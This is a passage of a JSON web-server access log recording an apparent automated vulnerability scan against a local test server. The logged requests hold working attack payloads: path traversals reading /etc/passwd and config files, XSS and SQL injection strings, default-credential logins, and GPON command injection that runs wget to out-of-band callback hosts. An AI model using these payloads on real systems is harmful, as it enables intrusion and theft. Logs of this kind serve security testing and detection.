(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mrtg/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0a/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /footer.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22methodInput\x22:[{\x22type\x22:\x22ClusterComputeResource\x22,\x22value\x22: null,\x22serverGuid\x22: null}]}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MRTG/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0d/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /e/ViewImg/index.html?url=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/login/page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Trace.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://ca28bc0smpvbbtig07h0p91bdpynzwfk4.oast.pro`;busybox wget http://ca28bc0smpvbbtig07h0u8cghmy97xsff.oast.pro&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%00/example.com/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /general/userinfo.php?UID=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-member/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"email='+or+2>1+--+&password=&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /scrm/crm/admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.rsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /VisionHubWebApi/api/Login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.020","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://ca28bc0smpvbbtig07h0xzdgqfyoocn5a.oast.pro`;wget http://ca28bc0smpvbbtig07h0mo5tf6nyk1g4s.oast.pro&ipv=0","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /GponForm/diag_Form?images/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hoteldruid/inizio.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/GetSrvInfo.exe HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml 